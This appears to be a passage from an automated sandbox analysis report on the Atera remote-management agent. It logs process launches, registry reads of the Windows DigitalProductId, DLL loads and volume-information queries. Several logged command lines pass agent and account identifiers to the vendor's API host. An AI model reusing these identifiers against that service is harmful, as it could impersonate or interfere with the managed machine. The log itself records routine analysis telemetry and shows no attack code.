                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "756f8df8-494a-4cdb-9b3b-3f26b40ddc77" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageosupdates\agentpackageosupdates.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "3117f898-c24e-40df-9020-7a24bf326b25" agent-api.atera.com/production 443 or8ixli90mf "getlistofallupdates" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ff450401-d5c7-4b18-a355-4c1c5f3fd956" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "bc07ae14-1fb3-4ad8-825a-cd1339068a47" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188739C cpuid 37_2_00007FFDF188739C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2E58.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI31B4.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI31B4.tmp-\Newtonsoft.Json.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI46E3.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI6CA1.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI6CA1.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI77D8.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI7BC1.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI7BC1.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
